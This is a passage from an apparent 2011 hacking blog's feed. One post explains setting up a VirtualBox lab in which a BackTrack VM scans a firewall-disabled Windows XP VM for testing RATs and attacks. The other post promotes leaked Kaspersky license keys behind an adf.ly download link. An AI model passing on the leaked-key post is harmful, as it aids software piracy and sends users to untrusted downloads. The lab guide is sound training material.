SP2 as the target operating system. You will need a bootable Windows XP SP2 iso for that. You can easily download it from Microsoft website or torrent. You can refer to this quick tutorial on how to setup a virtual machine using VBox and WIN XP.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;object class=&quot;BLOGGER-youtube-video&quot; classid=&quot;clsid:D27CDB6E-AE6D-11cf-96B8-444553540000&quot; codebase=&quot;http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0&quot; data-thumbnail-src=&quot;http://2.gvt0.com/vi/_D9kYJ9KPlo/0.jpg&quot; height=&quot;266&quot; width=&quot;320&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/_D9kYJ9KPlo&amp;fs=1&amp;source=uds&quot; /&gt;  &lt;param name=&quot;bgcolor&quot; value=&quot;#FFFFFF&quot; /&gt;  &lt;embed width=&quot;320&quot; height=&quot;266&quot;  src=&quot;http://www.youtube.com/v/_D9kYJ9KPlo&amp;fs=1&amp;source=uds&quot; type=&quot;application/x-shockwave-flash&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;br /&gt;So now you have a virtual machine where you can test all your applications and hacks.&lt;br /&gt;What is the next step that you can do with this virtual machine ? &amp;nbsp;Let us install a WAMP server and run DVWA over it. For those who are not aware of DVWA can check this link -&lt;a href=&quot;http://hackingalert.blogspot.com/2011/09/learn-hacking-by-doing-practical.html&quot; target=&quot;_blank&quot;&gt; Installing and working with DVWA.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;How to install applications on a virtual machine? Well the process is simple. When your Windows XP Virtual machine is running, then click on the DEVICE tab, move to USB and select your pendrive from the list.&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-H5iugCoEp-c/TsyJ0qlig6I/AAAAAAAAA5M/Svo9tXfe6Mo/s1600/vm1.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;254&quot; src=&quot;http://1.bp.blogspot.com/-H5iugCoEp-c/TsyJ0qlig6I/AAAAAAAAA5M/Svo9tXfe6Mo/s320/vm1.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Now you can install anything from a USB drive inside your virtual machine. There is also a facility to create shared folder with your host operating system but I would prefer that you use USB. Shared folder has some issues when your host operating system is Windows 7. You can install different servers, applications, RAT clients etc and play with it.&lt;br /&gt;&lt;br /&gt;Now what is the advantage of this virtual machine . Let us analyse:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;You can test all the viruses and RATs without any fear as your base operating system will not be affected.&amp;nbsp;&lt;/li&gt;&lt;li&gt;You can test different servers and applications easily without affecting your base operating system.&amp;nbsp;&lt;/li&gt;&lt;li&gt;In case the Virtual machine gets corrupt then you can re-install it.&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;There are also some key factors that you should remember which will help you during your pentesting:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Create a clone of the virtual machine&lt;/b&gt;&lt;br /&gt;This step is very helpful in case your VM gets corrupt. Creating a clone of it will prevent you from re-installing it again and again.&lt;br /&gt;You can create a clone by Right clicking on the Virtul machine instance in VBox and click on &quot;clone..&quot;&lt;br /&gt;You will notice that a cloned virtual WinXP will be created for you.&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-bSxWP4vXTq8/TsyMR0TDeiI/AAAAAAAAA5c/G9KjE291zUY/s1600/vm3.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;172&quot; src=&quot;http://1.bp.blogspot.com/-bSxWP4vXTq8/TsyMR0TDeiI/AAAAAAAAA5c/G9KjE291zUY/s400/vm3.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;Disable the windows Firewall&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;The next important thing you can do is disable the windows firewall and then perform your pentesting as the firewall may block some of the suspicious activities. Using the default Windows firewall of XP virtual machine you can also test weather your activity is traceable or not. This will give you a clear understanding why RATs are not&amp;nbsp;considered&amp;nbsp;as a suitable hack these days because they are easily detectable. You can disable the firewall by going to control pannel, clicking on Firewall and then disable it.&lt;br /&gt;In this way you can set up a suitable environment for your home experiments.&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;u&gt;WHAT NEXT ?&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Well a good question to ask if you have understood the above concepts. So far we discussed how to test different tools and techniques on a virtual operating system. The next step will be how to hack one virtual machine using the other. The scenario will be similar to hacking any system on internet so this technique will give you a real time exposure. Intresting... Lets proceed then. This time we will set up another virtual machine using BACKTRACK operating system which is one of the most widely used penetration testing operting system by security professionals. The reason which makes backtrack so popular is:&lt;br /&gt;&lt;br /&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;It has all the relevant tools pre-installed&lt;/li&gt;&lt;li&gt;it is linux based.&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;You can download the Backtrack 5 iso from its official website. Its a must have operating system for all.&amp;nbsp;&lt;/div&gt;&lt;div&gt;You can follow this simple video to install BT on virtualbox.&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;iframe allowfullscreen=&#39;allowfullscreen&#39; webkitallowfullscreen=&#39;webkitallowfullscreen&#39; mozallowfullscreen=&#39;mozallowfullscreen&#39; width=&#39;320&#39; height=&#39;266&#39; src=&#39;https://www.youtube.com/embed/up2OR1M0aUk?feature=player_embedded&#39; frameborder=&#39;0&#39; /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Once you are done with the installation part, the next step is to make the two virtual machines (BT and WinXP) connect with each other. There is a simple setting that you will have to make in both the virtual machines. Let&#39;s check it out.&amp;nbsp;&lt;/div&gt;&lt;div&gt;Select the Backtrack virtual machine, then click on settings tab, then move to &quot;network&quot; settings. You will find that &quot;Adapter 1&quot; is set to NAT adapter. Switch to the &quot;Adapter 2&quot; tab.&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-fA_8A0l0VCc/TsyZw3oJbXI/AAAAAAAAA5k/1jCPL52dBCI/s1600/vm4.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;http://1.bp.blogspot.com/-fA_8A0l0VCc/TsyZw3oJbXI/AAAAAAAAA5k/1jCPL52dBCI/s640/vm4.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;In the Adapter2 tab, set the adapter as &quot;Host-Only Adapter&quot;. Set the name of adapter as &quot;VirtualBox Host Only Ethernet Adapter&quot; . See the figure.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-SgP4sPMWy8E/TsyZyuz4iPI/AAAAAAAAA5s/YJhptTFDibo/s1600/vm5.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;478&quot; src=&quot;http://4.bp.blogspot.com/-SgP4sPMWy8E/TsyZyuz4iPI/AAAAAAAAA5s/YJhptTFDibo/s640/vm5.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Make similar setting changes in your windows XP virtual machine as well. Now your two virtual machines are ready to connect with each other. You can check the IP address of Windows machine by using the ipconfig command in the command prompt and similarly you can check the IP address of the BT machine using the ifconfig command. Also you can ping the two machines to check if both are detecting each other (don&#39;t&amp;nbsp;forget to disable the windows firewall else it will filter the ping data packets).&lt;br /&gt;The following image shows my two virtual machines. One is WinXP and other is BT5 with there&amp;nbsp;corresponding ip addresses. Both are running ovr my host operating system Win7. So in all there are 3 operating systems running simultaneously.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-q3PF57va6yY/TsyeHMlHcDI/AAAAAAAAA50/-e6DmpLFlUk/s1600/vm6.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;281&quot; src=&quot;http://3.bp.blogspot.com/-q3PF57va6yY/TsyeHMlHcDI/AAAAAAAAA50/-e6DmpLFlUk/s640/vm6.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Now you can use various options available in Backtrack OS to perform tests on the WinXP box. Let us quickly perform a nmap scan to check the open ports on WinXP machine.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-KebGDaG3iMY/Tsyfh4Qv14I/AAAAAAAAA58/kIP6EugTqhc/s1600/vm7.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;272&quot; src=&quot;http://2.bp.blogspot.com/-KebGDaG3iMY/Tsyfh4Qv14I/AAAAAAAAA58/kIP6EugTqhc/s400/vm7.PNG&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;As you can see that the target is up and has some open ports as well. Similarly you can perform several attacks and use the tools available in Backtrack to penetrate the target windows XP machine without harming your own operating system.&lt;br /&gt;You can use this technique to perform several tests like :&lt;br /&gt;&lt;br /&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;You can try to hack different operating systems by installing them as a virtual machine.&amp;nbsp;&lt;/li&gt;&lt;li&gt;This will have a real time simulation of original scenario.&lt;/li&gt;&lt;li&gt;You can increase the level of difficulty of your hacks by installing firewalls, IDS/IPS etc.&amp;nbsp;&lt;/li&gt;&lt;li&gt;This is a self&amp;nbsp;customization&amp;nbsp;scenario where you can do what ever you want.&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;This is just a quick example for you all to get started with using VM&#39;s for pentesting and hacking. You can further take this tutorial to next level by experimenting with various&amp;nbsp;flavors&amp;nbsp;of operating systems and try your hands on them . This can be like a practice Battlefield for you before you dive deep into the real fight.&lt;br /&gt;&lt;br /&gt;There are several small problems which you may encounter while performing these steps. So keep adding your queries so that I can help you resolve them. This is one of the most uniquest tutorial you will find on the internet. So keep adding your comments and queries so that you can enjoy this technique. Once you have successfully performed it, you will love playing with this scenario.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/2370883560292877112/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/11/setting-up-your-own-pentestinghacking.html#comment-form' title='12 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/2370883560292877112'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/2370883560292877112'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/11/setting-up-your-own-pentestinghacking.html' title='Setting up your own Pentesting/Hacking Network using a single Machine'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-1dYI0CAoqLo/TsyjjOGWxlI/AAAAAAAAA6E/aG7LnSIzDuE/s72-c/images.jpg" height="72" width="72"/><thr:total>12</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-7734761583637703261</id><published>2011-11-15T11:03:00.001+05:30</published><updated>2011-12-19T12:05:06.391+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="kaspersky antivirus 2012 key"/><category scheme="http://www.blogger.com/atom/ns#" term="kaspersky internet security 2012 key"/><category scheme="http://www.blogger.com/atom/ns#" term="Kaspersky pure key"/><category scheme="http://www.blogger.com/atom/ns#" term="serials and keys"/><title type='text'>Kaspersky Pure and Kaspersky 2012 Latest keys - Not Blocked</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt;&lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-q6palCwPk1M/TsH68ILIaLI/AAAAAAAAA5A/ua7H8W9Mq8I/s1600/2012.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;140&quot; src=&quot;http://2.bp.blogspot.com/-q6palCwPk1M/TsH68ILIaLI/AAAAAAAAA5A/ua7H8W9Mq8I/s200/2012.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Some latest keys for Kaspersky are leaked again. Grab your key immideately. Stay connected with HackingAlert for regular updates of Kespersky keys.&lt;br /&gt;&lt;br /&gt;Activation Method:&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;1. Open Kaspersky 2011 License Manager (from lower right corner).&lt;br /&gt;&lt;br /&gt;&amp;nbsp; 2. Click Activate the application with a new license button. (Delete any trial key&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; first,by clicking the red X next to the key).&lt;br /&gt;&lt;br /&gt;&amp;nbsp; 3. Select Activate commercial version and enter the activation license code as&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; 11111-11111-11111-1111X&lt;br /&gt;&lt;br /&gt;&amp;nbsp; 4. Wait activation wizard message-&amp;gt;Click OK&lt;br /&gt;&lt;br /&gt;&amp;nbsp; 5. Wait for wrong activation code message-&amp;gt;Click OK-&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; 6. Screen will appear with KEY FILE BROWSE&lt;br /&gt;&lt;br /&gt;&amp;nbsp; 7. Browse to the key&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; location and activate kaspersky.&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://adf.ly/3jOlW&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;DOWNLOAD KEYS&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/7734761583637703261/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/11/kaspersky-pure-and-kaspersky-2012.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/7734761583637703261'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/7734761583637703261'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/11/kaspersky-pure-and-kaspersky-2012.html' title='Kaspersky Pure and Kaspersky 2012 Latest keys - Not Blocked'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-q6palCwPk1M/TsH68ILIaLI/AAAAAAAAA5A/ua7H8W9Mq8I/s72-c/2012.jpg" height="72" width="72"/><thr:total>2</thr:total></entry></feed>